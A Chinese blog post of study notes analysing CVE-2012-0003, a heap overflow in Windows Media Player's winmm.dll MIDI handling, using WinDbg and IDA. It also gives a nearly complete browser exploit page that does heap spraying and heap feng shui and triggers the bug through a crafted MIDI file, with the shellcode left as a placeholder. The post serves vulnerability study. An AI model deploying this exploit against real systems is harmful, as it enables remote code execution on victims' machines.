<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.8.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="一、找到漏洞触发函数windbg附加iexplore.exe,加载POC文件。123456789100:009&amp;gt; g(bfc.c78): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception">
<meta property="og:type" content="article">
<meta property="og:title" content="cve-2012-0003 Microsoft Windows Media Player winmm.dll MIDI文件堆溢出漏洞">
<meta property="og:url" content="http://yoursite.com/2018/09/19/漏洞战争/堆溢出/2/index.html">
<meta property="og:site_name" content="My blog">
<meta property="og:description" content="一、找到漏洞触发函数windbg附加iexplore.exe,加载POC文件。123456789100:009&amp;gt; g(bfc.c78): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-04-07T17:07:44.870Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="cve-2012-0003 Microsoft Windows Media Player winmm.dll MIDI文件堆溢出漏洞">
<meta name="twitter:description" content="一、找到漏洞触发函数windbg附加iexplore.exe,加载POC文件。123456789100:009&amp;gt; g(bfc.c78): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception">

<link rel="canonical" href="http://yoursite.com/2018/09/19/漏洞战争/堆溢出/2/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>cve-2012-0003 Microsoft Windows Media Player winmm.dll MIDI文件堆溢出漏洞 | My blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">My blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/09/19/漏洞战争/堆溢出/2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="xxx">
      <meta itemprop="description" content>
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          cve-2012-0003 Microsoft Windows Media Player winmm.dll MIDI文件堆溢出漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2018-09-19 23:23:27" itemprop="dateCreated datePublished" datetime="2018-09-19T23:23:27+08:00">2018-09-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-04-08 01:07:44" itemprop="dateModified" datetime="2019-04-08T01:07:44+08:00">2019-04-08</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/《漏洞战争》学习笔记/" itemprop="url" rel="index"><span itemprop="name">《漏洞战争》学习笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/《漏洞战争》学习笔记/第二章-堆溢出/" itemprop="url" rel="index"><span itemprop="name">第二章-堆溢出</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>一、找到漏洞触发函数<br>windbg附加iexplore.exe,加载POC文件。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">0:009&gt; g</span><br><span class="line">(bfc.c78): Access violation - code c0000005 (first chance)</span><br><span class="line">First chance exceptions are reported before any exception handling.</span><br><span class="line">This exception may be expected and handled.</span><br><span class="line">eax=001d5a2c ebx=00000000 ecx=0c0c0c0c edx=0000003d esi=001be3f8 edi=01776230</span><br><span class="line">eip=7e38dfe8 esp=0012e198 ebp=0012e1a8 iopl=0         nv up ei pl nz na po nc</span><br><span class="line">cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202</span><br><span class="line">*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\mshtml.dll - </span><br><span class="line">mshtml!CreateHTMLPropertyPage+0x38108:</span><br><span class="line">7e38dfe8 ff5104          call    dword ptr [ecx+4]    ds:0023:0c0c0c10=????????</span><br></pre></td></tr></table></figure></p>
<p>程序在该位置中断，可以看到程序在call [ecx+4]，且[ecx+4]地址为0c0c0c10,而且调试的程序很容易就想到针对堆溢出的heap spray漏洞利用方法，而且并没有在0c0c0c10申请shellcode导致程序中断。<br>因此暂时猜测是堆溢出漏洞，通过gflags.exe -i iexplore.exe +hpa开启堆页检测，再次运行IE，加载POC。<br><a id="more"></a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">0:009&gt; g</span><br><span class="line">(27c.a28): Access violation - code c0000005 (first chance)</span><br><span class="line">First chance exceptions are reported before any exception handling.</span><br><span class="line">This exception may be expected and handled.</span><br><span class="line">eax=00000419 ebx=0000007d ecx=007db29f edx=00000000 esi=07d5b019 edi=07d58f60</span><br><span class="line">eip=76b2d224 esp=07a7fe80 ebp=07a7fea0 iopl=0         nv up ei pl zr na pe nc</span><br><span class="line">cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246</span><br><span class="line">WINMM!midiOutPlayNextPolyEvent+0x1ec:</span><br><span class="line">76b2d224 8a06            mov     al,byte ptr [esi]          ds:0023:07d5b019=??</span><br></pre></td></tr></table></figure></p>
<p>访问esi时产生异常，通过栈回溯发现异常发生在WINMM模块。通过IDA分析WINMM.dll文件并跳到漏洞触发位置所在函数，发现漏洞位于midiOutPlayNextPolyEvent函数。</p>
<p>二、分析漏洞触发原因<br>首先静态分析发现，v25=（v24+v20），而访问v25所指向地址*v25（即mov al,[esi]）时导致异常，因此查看v24和v20来源。分析发现该函数中的各个变量都是由dword ptr [edi+?]来分配的，而edi=[ebp+arg_0],也可以认为变量都是由[参数a+偏移值]决定的。<br>在函数midiOutPlayNextPolyEvent下断点，配合windbg与IDA动静结合进行分析，发现该函数的唯一参数为一个地址，当</p>
<figure class="highlight plain"><figcaption><span>dword ptr [edi+34h], 0```</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">成立时，程序进入一个大的循环。前几个循环程序在</span><br><span class="line"></span><br><span class="line">```76b2d1f6 cmp dl,90h和76b2d1fe cmp dl，80h</span><br></pre></td></tr></table></figure>
<p>处由于dl（dl=v36=v21&amp;0xF）不等于80h或者90h而导致程序跳过了漏洞触发点，如图<a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-1.png" target="_blank" rel="noopener">7-1</a>所示</p>
<p>分析得出v20值是固定的由参数a决定，v24由v40和v21决定，而v21和v40都由v13决定。为了确定漏洞触发前后各个变量的值，下以下断点用来观察漏洞触发前后v9、v11、v21、v23、v24、v20、v40的值，来看看到底做了哪些操作</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">bp 76b2d096 &quot;.printf \&quot;v9:%x\&quot;,[esi+24h];.echo;g&quot;</span><br><span class="line">bp 76b2d0c3 &quot;.printf \&quot;v13=v11&amp;0xFFFFFF=v11:%x\&quot;,ecx;.echo;g&quot;</span><br><span class="line">bp 76b2d1d0 &quot;.printf \&quot;v40:%x\&quot;,cl;.echo;g&quot;</span><br><span class="line">bp 76b2d1eb &quot;.printf \&quot;v40:%x\&quot;,dl;.echo;g&quot;</span><br><span class="line">bp 76b2d1c7 &quot;.printf \&quot;v21:%x\&quot;,cl;.echo;g&quot;</span><br><span class="line">bp 76b2d20d &quot;.printf \&quot;v23(%x)=v40(%x)+v21&amp;F&lt;&lt;7(%x)\&quot;,edx+eax,edx,eax;.echo;g&quot;  </span><br><span class="line">bp 76b2d21e &quot;.printf \&quot;v24=v23/2=%x, v20=%x\&quot;,eax,esi;.echo;g&quot;</span><br></pre></td></tr></table></figure>
<p>运行程序并加载poc后输出如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">v21:b9</span><br><span class="line">v40:6</span><br><span class="line">v9:7bd2fe4</span><br><span class="line">v13=v11&amp;0xFFFFFF=v11:7f65b9</span><br><span class="line">v21:b9</span><br><span class="line">v40:65</span><br><span class="line">v9:7bd2fe4</span><br><span class="line">v13=v11&amp;0xFFFFFF=v11:7f64b9</span><br><span class="line">v21:b9</span><br><span class="line">v40:64</span><br><span class="line">v9:7bd2fe4</span><br><span class="line">v13=v11&amp;0xFFFFFF=v11:640bb8</span><br><span class="line">v21:b8</span><br><span class="line">v40:b</span><br><span class="line">v9:7bd2fe4</span><br><span class="line">v13=v11&amp;0xFFFFFF=v11:460bb3</span><br><span class="line">v21:b3</span><br><span class="line">v40:b</span><br><span class="line">v9:7bd2fe4</span><br><span class="line">v13=v11&amp;0xFFFFFF=v11:7db29f</span><br><span class="line">v21:9f</span><br><span class="line">v40:b2</span><br><span class="line">v23(832)=v40(b2)+v21&amp;F&lt;&lt;7(780)</span><br><span class="line">v24=v23/2=419, v20=57e6c00</span><br><span class="line">(674.d50): Access violation - code c0000005 (first chance)</span><br><span class="line">First chance exceptions are reported before any exception handling.</span><br><span class="line">This exception may be expected and handled.</span><br><span class="line">eax=00000419 ebx=0000007d ecx=007db29f edx=00000000 esi=057e7019 edi=057d6f60</span><br><span class="line">eip=76b2d224 esp=07eefe80 ebp=07eefea0 iopl=0         nv up ei pl zr na pe nc</span><br><span class="line">cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246</span><br><span class="line">WINMM!midiOutPlayNextPolyEvent+0x1ec:</span><br><span class="line">76b2d224 8a06            mov     al,byte ptr [esi]          ds:0023:057e7019=??</span><br></pre></td></tr></table></figure>
<p>可以看出几个变量之间的关系。<br>最后调用的<em>(v24+v20)访问异常。<br>v20=v1+132=57e6c00<br>V24=v23/2<br>v23=v40+v21&amp;F&lt;&lt;7,v40等于v13的倒数第二字节决定，v21等于v13的最后一字节决定。查看堆情况如图<a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-2.png" target="_blank" rel="noopener">7-2</a>，发现57e6c00为堆起始地址(v20)，堆大小为400h，而v24=419h&gt;400h，因此v20+v24=057e7019导致了堆的越界访问。<br>那我们再回过头来总分析一下当v13=7db29f，v40=2b，v21=9f时，因为v21=9f使程序进入访问</em>(v20+v24)的条件语句成立，而v24=(v40+v21&amp;F&lt;&lt;7)/2=419超过了400，也就是说v40即v13的倒数第二字节大于80h(80h+780h)/2=400)时，导致了堆的越界访问。<br>PS:这里v21=8F话同样会使程序访问*(v20+v24)，只要v40大于80h。<br>这里我们再看一下v20(v1+132)的来源，通过IDA的交叉引用功能可以看到midioutplaynextolyevent由midiouttimertick调用，反汇编midiouttimertick，发现调用midioutplaynextolyevent时传入的参数等于gpEmuList，通过交叉引用功能看到gpEmulist会在mseopen和mseclose中被调用，最后可以再mseopen里看到gpEmuList对赋值，其中gpEmuList=v5，v5+132=v6，而v6=winmmAlloc(0x400u)，因此用来索引的v20为申请400H大小的堆地址。<br>这里我们已经发现导致异常发生的关键就是v13=7db29f，分析poc发现加载了toto.mid文件，用010edit分析toto.mid文件如图<br><a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-3.png" target="_blank" rel="noopener">7-3</a>，<a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-3.png" target="_blank" rel="noopener">7-4</a><br>可以看到track[4]-message[9]-m_status=9f即v21，track[4]-message[9]-m_note=b2即v40,<br>参考midi文件格式</p>
<p><a href="https://wenku.baidu.com/view/f62f6847a517866fb84ae45c3b3567ec102ddc65.html" title="midi文件格式（中文）" target="_blank" rel="noopener">midi文件格式介绍（中文）</a>,<br><a href="https://datatracker.ietf.org/doc/rfc6295/?include_text=1" title="rfc6295标准" target="_blank" rel="noopener">rfc6295标准</a></p>
<p>对比midi文件知道7db29f中7d为速度，b2为音符号，9F为事件类型（音符打开)且通道号F，而WINMM.dll处理音符打开时，会读取<em>(参数+通道号</em>128+音符号)的值，如果(通道号*128+音符号)&gt;400h则会导致堆的越界访问。<br>到这里位置只是堆的越界访问，并不能直接利用。而程序接下来的行为如图<a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-3.png" target="_blank" rel="noopener">7-4</a>，<a href="https://raw.githubusercontent.com/yi0934/yi0934.github.io/master/image/7-4.png" target="_blank" rel="noopener">7-4</a><br>当v40即音符号不等于0且读取到的值的低位字节不等于15则读取到的值加1，这个越界访问到的值加1怎么能导致任意代码执行呢。</p>
<p>三、漏洞利用<br>让我们看看vupen组织怎么通过只控制一字节的情况下，稳定利用漏洞（这个其实书里讲的很清楚，这里我们再动手做一遍加深印象和理解）。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;script language=&apos;javascript&apos;&gt;						&lt;!--先申请构造nopsled+shellcode+nopsled结构的内存--&gt;  </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            var chunk_size, payload, nopsled;</span><br><span class="line">            </span><br><span class="line">            chunk_size = 0x100000;</span><br><span class="line">            payload = unescape(&quot;shellcode&quot;);</span><br><span class="line">            nopsled = unescape(&quot;%u0c0c%u0c0c&quot;);</span><br><span class="line">            while (nopsled.length &lt; chunk_size)</span><br><span class="line">                nopsled += nopsled;</span><br><span class="line">            nopsled_len = chunk_size - (payload.length + 20);        </span><br><span class="line">            nopsled = nopsled.substring(0, nopsled_len);</span><br><span class="line">            heap_chunks = new Array();</span><br><span class="line">            for (var i = 0 ; i &lt; 0x100 ; i++)</span><br><span class="line">                heap_chunks[i] = nopsled + payload;</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;script language=&apos;javascript&apos;&gt;</span><br><span class="line"></span><br><span class="line">var selob = document.createElement(&quot;select&quot;)     	&lt;!--创建select元素selob--&gt;    </span><br><span class="line">selob.w0 = alert									&lt;!--为selob设置64个属性，其中w1为string--&gt;   </span><br><span class="line">selob.w1 = unescape(&quot;%u1be4%u0c0c&quot;)</span><br><span class="line">selob.w2 = alert</span><br><span class="line">selob.w3 = alert</span><br><span class="line">selob.w4 = alert</span><br><span class="line">selob.w5 = alert</span><br><span class="line">selob.w6 = alert</span><br><span class="line">selob.w7 = alert</span><br><span class="line">selob.w8 = alert</span><br><span class="line">selob.w9 = alert</span><br><span class="line">selob.w10 = alert</span><br><span class="line">selob.w11 = alert</span><br><span class="line">selob.w12 = alert</span><br><span class="line">selob.w13 = alert</span><br><span class="line">selob.w14 = alert</span><br><span class="line">selob.w15 = alert</span><br><span class="line">selob.w16 = alert</span><br><span class="line">selob.w17 = alert</span><br><span class="line">selob.w18 = alert</span><br><span class="line">selob.w19 = alert</span><br><span class="line">selob.w20 = alert</span><br><span class="line">selob.w21 = alert</span><br><span class="line">selob.w22 = alert</span><br><span class="line">selob.w23 = alert</span><br><span class="line">selob.w24 = alert</span><br><span class="line">selob.w25 = alert</span><br><span class="line">selob.w26 = alert</span><br><span class="line">selob.w27 = alert</span><br><span class="line">selob.w28 = alert</span><br><span class="line">selob.w29 = alert</span><br><span class="line">selob.w30 = alert</span><br><span class="line">selob.w31 = alert</span><br><span class="line">selob.w32 = alert</span><br><span class="line">selob.w33 = alert</span><br><span class="line">selob.w34 = alert</span><br><span class="line">selob.w35 = alert</span><br><span class="line">selob.w36 = alert</span><br><span class="line">selob.w37 = alert</span><br><span class="line">selob.w38 = alert</span><br><span class="line">selob.w39 = alert</span><br><span class="line">selob.w40 = alert</span><br><span class="line">selob.w41 = alert</span><br><span class="line">selob.w42 = alert</span><br><span class="line">selob.w43 = alert</span><br><span class="line">selob.w44 = alert</span><br><span class="line">selob.w45 = alert</span><br><span class="line">selob.w46 = alert</span><br><span class="line">selob.w47 = alert</span><br><span class="line">selob.w48 = alert</span><br><span class="line">selob.w49 = alert</span><br><span class="line">selob.w50 = alert</span><br><span class="line">selob.w51 = alert</span><br><span class="line">selob.w52 = alert</span><br><span class="line">selob.w53 = alert</span><br><span class="line">selob.w54 = alert</span><br><span class="line">selob.w55 = alert</span><br><span class="line">selob.w56 = alert</span><br><span class="line">selob.w57 = alert</span><br><span class="line">selob.w58 = alert</span><br><span class="line">selob.w59 = alert</span><br><span class="line">selob.w60 = alert</span><br><span class="line">selob.w61 = alert</span><br><span class="line">selob.w62 = alert</span><br><span class="line">selob.w63 = alert</span><br><span class="line"></span><br><span class="line">	var clones=new Array(1000);			&lt;!--创建数组clones，大小为1000--&gt;   </span><br><span class="line"></span><br><span class="line">	function feng_shui() &#123;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">		var i = 0;</span><br><span class="line">		while (i &lt; 1000) &#123;</span><br><span class="line">			clones[i] = selob.cloneNode(true)</span><br><span class="line">			i = i + 1;</span><br><span class="line">		&#125;								&lt;!--将selob复制到clones数组中--&gt;  </span><br><span class="line"></span><br><span class="line">		var j = 0;</span><br><span class="line">		while (j &lt; 1000) &#123;</span><br><span class="line">			delete clones[j];</span><br><span class="line">			CollectGarbage();</span><br><span class="line">			j  = j + 2;</span><br><span class="line">		&#125;								&lt;!--间隔删除clones数组中的元素--&gt;  </span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">feng_shui();				</span><br><span class="line"></span><br><span class="line">		function trigger()&#123;</span><br><span class="line">		var k = 999;</span><br><span class="line">		while (k &gt; 0) &#123;</span><br><span class="line">			if (typeof(clones[k].w1) == &quot;string&quot;) &#123;</span><br><span class="line">			&#125; else &#123;</span><br><span class="line">				clones[k].w1(&apos;come on!&apos;);</span><br><span class="line">			&#125;</span><br><span class="line">			k = k - 2;</span><br><span class="line">		&#125;</span><br><span class="line">		feng_shui();					&lt;!----&gt;  </span><br><span class="line">		document.audio.Play();			&lt;!--调用恶意构造的MIDI，而winmm.dll处理MIDI message时会申请400h大小的堆空间，正好命中我们精心构造的clones数组，当碰到速度为7d，音符号为b2，事件类型为音符打开且通道号为F时，造成堆溢出，更改419处的值加1即clones数组中某一个元素的下一个元素的偏移19的位置，而该位置正好是w1属性类型的定义为string(0X08)，加一变为object(0X090)--&gt;  </span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;script for=audio event=PlayStateChange(oldState,newState)&gt;</span><br><span class="line">	if (oldState == 3 &amp;&amp; newState == 0) &#123;</span><br><span class="line">		trigger();</span><br><span class="line">	&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;object ID=&quot;audio&quot; WIDTH=1 HEIGHT=1 CLASSID=&quot;CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95&quot;&gt;</span><br><span class="line">		&lt;param name=&quot;fileName&quot; value=&quot;test_case.mid&quot;&gt;</span><br><span class="line">		&lt;param name=&quot;SendPlayStateChangeEvents&quot; value=&quot;true&quot;&gt;</span><br><span class="line">		&lt;param NAME=&quot;AutoStart&quot; value=&quot;True&quot;&gt;</span><br><span class="line">		&lt;param name=&quot;uiMode&quot; value=&quot;mini&quot;&gt;</span><br><span class="line">		&lt;param name=&quot;Volume&quot; value=&quot;-300&quot;&gt;</span><br><span class="line">	&lt;/object&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/09/19/漏洞战争/栈溢出/5/" rel="prev" title="CVE-2012-0158 Microsoft Office MSCOMCTL.ocx栈溢出漏洞">
      <i class="fa fa-chevron-left"></i> CVE-2012-0158 Microsoft Office MSCOMCTL.ocx栈溢出漏洞
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/09/19/漏洞战争/堆溢出/1/" rel="next" title="cve-2010-2553Microsoft Cinepak Codec CVDecompress函数堆溢出漏洞">
      cve-2010-2553Microsoft Cinepak Codec CVDecompress函数堆溢出漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">xxx</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
